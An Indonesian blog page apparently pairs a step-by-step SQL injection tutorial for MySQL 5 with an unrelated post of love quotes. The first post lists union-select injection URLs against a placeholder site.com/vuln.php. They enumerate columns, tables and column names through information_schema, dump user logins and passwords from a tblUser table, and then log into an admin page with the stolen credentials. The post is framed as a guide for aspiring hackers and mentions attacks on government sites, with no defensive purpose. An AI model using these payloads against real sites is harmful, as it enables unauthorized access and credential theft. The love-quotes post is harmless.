Cara Sederhana SQL Injection MySQL v5

Komunitas hacker Tanah Air semakin muncul dan melahirkan Hacker-hacker muda berbakat. Berbagai site, server, tak luput dari serangan-serangan anak bangsa. Bahkan situs pemerintah Negara pun tak luput dari serangan. Dari sinilah jati diri seorang hacker akan diuji. Bahwa hacker itu tidak merusak sebuah system yang telah ia hack, bila seorang hacker adalah perusak, itu tak lain adalah seorang cracker(perusak) dan bukan hacker.
Saya sendiri bukan seorang hacker, (masih newbies.. alias orang yang pengen jadi hacker dan masih dalam tahap belajar, belajar, berlatih dan mencoba.
Viva Indonesian Hacker!
check it out!

Pertama cari targetnya. Atau gunakan link berikut biar cepet:

http://72.14.205.100/ ^_^

Misal Kita dapet yang ini:

http://site.com/vuln.php?id=1′ <- errorkita coba cari nama databasenya http://site.com/vuln.php?id=1 union all select 0 from admin

didapat nama databasenya bego

http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables

belum berhasil kita cari jumlah kolomnya

http://site.com/vuln.php?id=1 order by 9/* tidak eror http://site.com/vuln.php?id=1 order by 10/*

eror maka diambil kesimpulan kolomnya berjumlah 9

http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

tidak didapat apa2 tambahkan (-) didepan belakang (=)

http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

didapat angka 3 untuk mencari nama tabelnya, angka 3 kita ganti dengan table_name

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’/*

didapat nama tabel tblArsipuntuk mencari nama2 tabel lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 4,1/*

sampe gak ada lagi tanda yang muncul di monitormisalkan kita mendapatkan nama tabelnya adalah tbl User sekarang kita akan mencari nama2 kolomnyauntuk mencari nama tabelnya, angka 3 kita ganti dengan column_name

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’/*

didapat nama kolomnya UserNameuntuk mencari nama2 kolom lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 4,1/*

didapat nama kolom UserName, UserLogin, UserPass, UserMailsetelah dapat nama kolom dan tabelnya kita masukkan

http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser

http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser

didapat loginnya admin didapat passnya 1234 tinggal kita cari halaman admin. Misalnya kita temukan

http://site.com/admin.php

tinggal kita masukkan aja
loginnya:admin
passwordnya:1234

author: Andr3^81

referensi
http://andr381.wordpress.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/

More about → Cara Sederhana SQL Injection MySQL v5

Kata Mutiara 1

Tuhan memberi kita dua kaki untuk berjalan, dua tangan untuk memegang, dua telinga untuk mendengar dan dua mata untuk melihat. Tetapi mengapa Tuhan hanya menganugerahkan sekeping hati pada kita? Karena Tuhan telah memberikan sekeping lagi hati pada seseorang untuk kita mencarinya. Itulah namanya Cinta.

Cinta tidak pernah meminta, ia sentiasa memberi, cinta membawa penderitaan, tetapi tidak pernah berdendam, tak pernah membalas dendam. Di mana ada cinta di situ ada kehidupan; manakala kebencian membawa kepada kemusnahan.~ Mahatma Ghandi

Ada 2 titis air mata mengalir di sebuah sungai. Satu titis air mata tu menyapa air mata yg satu lagi,” Saya air mata seorang gadis yang mencintai seorang lelaki tetapi telah kehilangannya. Siapa kamu pula?”. Jawab titis air mata kedua tu,” Saya air mata seorang lelaki yang menyesal membiarkan seorang gadis yang mencintai saya berlalu begitu sahaja.”

Cinta sejati adalah ketika dia mencintai orang lain, dan kamu masih mampu tersenyum, sambil berkata: aku turut bahagia untukmu.

Jika kita mencintai seseorang, kita akan sentiasa mendoakannya walaupun dia tidak berada disisi kita.

Jangan sesekali mengucapkan selamat tinggal jika kamu masih mau mencoba. Jangan sesekali menyerah jika kamu masih merasa sanggup. Jangan sesekali mengatakan kamu tidak mencintainya lagi jika kamu masih tidak dapat melupakannya.

Perasaan cinta itu dimulai dari mata, sedangkan rasa suka dimulai dari telinga. Jadi jika kamu mahu berhenti menyukai seseorang, cukup dengan menutup telinga. Tapi apabila kamu Coba menutup matamu dari orang yang kamu cintai, cinta itu berubah menjadi titisan air mata dan terus tinggal dihatimu dalam jarak waktu yang cukup lama.

Cinta datang kepada orang yang masih mempunyai harapan walaupun mereka telah dikecewakan. Kepada mereka yang masih percaya, walaupun mereka telah dikhianati. Kepada mereka yang masih ingin mencintai, walaupun mereka telah disakiti sebelumnya dan kepada mereka yang mempunyai keberanian dan keyakinan untuk membangunkan kembali kepercayaan.

Jangan simpan kata-kata cinta pada orang yang tersayang sehingga dia meninggal dunia , lantaran akhirnya kamu terpaksa catatkan kata-kata cinta itu pada pusaranya . Sebaliknya ucapkan kata-kata cinta yang tersimpan dibenakmu itu sekarang selagi ada hayatnya.

Mungkin Tuhan menginginkan kita bertemu dan bercinta dengan orang yang salah sebelum bertemu dengan orang yang tepat, kita harus mengerti bagaimana berterima kasih atas kurniaan itu.

Cinta bukan mengajar kita lemah, tetapi membangkitkan kekuatan. Cinta bukan mengajar kita menghinakan diri, tetapi menghembuskan kegagahan. Cinta bukan melemahkan semangat, tetapi membangkitkan semangat -Hamka

Cinta dapat mengubah pahit menjadi manis, debu beralih emas, keruh menjadi bening, sakit menjadi sembuh, penjara menjadi telaga, derita menjadi nikmat, dan kemarahan menjadi rahmat.

Sungguh menyakitkan mencintai seseorang yang tidak mencintaimu, tetapi lebih menyakitkan adalah mencintai seseorang dan kamu tidak pernah memiliki keberanian untuk menyatakan cintamu kepadanya.

Hal yang menyedihkan dalam hidup adalah ketika kamu bertemu seseorang yang sangat berarti bagimu. Hanya untuk menemukan bahawa pada akhirnya menjadi tidak bererti dan kamu harus membiarkannya pergi.

Kamu tahu bahwa kamu sangat merindukan seseorang, ketika kamu memikirkannya hatimu hancur berkeping.
Dan hanya dengan mendengar kata “Hai” darinya, dapat menyatukan kembali kepingan hati tersebut.

Tuhan ciptakan 100 bahagian kasih sayang. 99 disimpan disisinya dan hanya 1 bahagian diturunkan ke dunia. Dengan kasih sayang yang satu bahagian itulah, makhluk saling berkasih sayang sehingga kuda mengangkat kakinya kerana takut anaknya terpijak.

Kadangkala kamu tidak menghargai orang yang mencintai kamu sepenuh hati, sehinggalah kamu kehilangannya. Pada saat itu, tiada guna sesalan karena perginya tanpa berpatah lagi.

Jangan mencintai seseorang seperti bunga, kerana bunga mati kala musim berganti. Cintailah mereka seperti sungai, kerana sungai mengalir selamanya.

Cinta mampu melunakkan besi, menghancurkan batu, membangkitkan yang mati dan meniupkan kehidupan padanya serta membuat budak menjadi pemimpin. Inilah dasyatnya cinta !

Permulaan cinta adalah membiarkan orang yang kamu cintai menjadi dirinya sendiri, dan tidak merubahnya menjadi gambaran yang kamu inginkan. Jika tidak, kamu hanya mencintai pantulan diri sendiri yang kamu temukan di dalam dirinya.

Cinta itu adalah perasaan yang mesti ada pada tiap-tiap diri manusia, ia laksana setitis embun yang turun dari langit,bersih dan suci. Cuma tanahnyalah yang berlain-lainan menerimanya. Jika ia jatuh ke tanah yang tandus,tumbuhlah oleh kerana embun itu kedurjanaan, kedustaan, penipu, langkah serong dan lain-lain perkara yang tercela. Tetapi jika ia jatuh kepada tanah yang subur,di sana akan tumbuh kesuciaan hati, keikhlasan, setia budi pekerti yang tinggi dan lain-lain perangai yang terpuji.~ Hamka

Kata-kata cinta yang lahir hanya sekadar di bibir dan bukannya di hati mampu melumatkan seluruh jiwa raga, manakala kata-kata cinta yang lahir dari hati yang ikhlas mampu untuk mengubati segala luka di hati orang yang mendengarnya.

Kamu tidak pernah tahu bila kamu akan jatuh cinta. namun apabila sampai saatnya itu, raihlah dengan kedua tanganmu,dan jangan biarkan dia pergi dengan sejuta rasa tanda tanya dihatinya

Cinta bukanlah kata murah dan lumrah dituturkan dari mulut ke mulut tetapi cinta adalah anugerah Tuhan yang indah dan suci jika manusia dapat menilai kesuciannya.

Bukan laut namanya jika airnya tidak berombak. Bukan cinta namanya jika perasaan tidak pernah terluka. Bukan kekasih namanya jika hatinya tidak pernah merindu dan cemburu.

Bercinta memang mudah. Untuk dicintai juga memang mudah. Tapi untuk dicintai oleh orang yang kita cintai itulah yang sukar diperoleh.
Satu-satunya cara agar kita memperolehi kasih sayang, ialah jangan menuntut agar kita dicintai, tetapi mulailah memberi kasih sayang kepada orang lain tanpa mengharapkan balasan.

More about → Kata Mutiara 1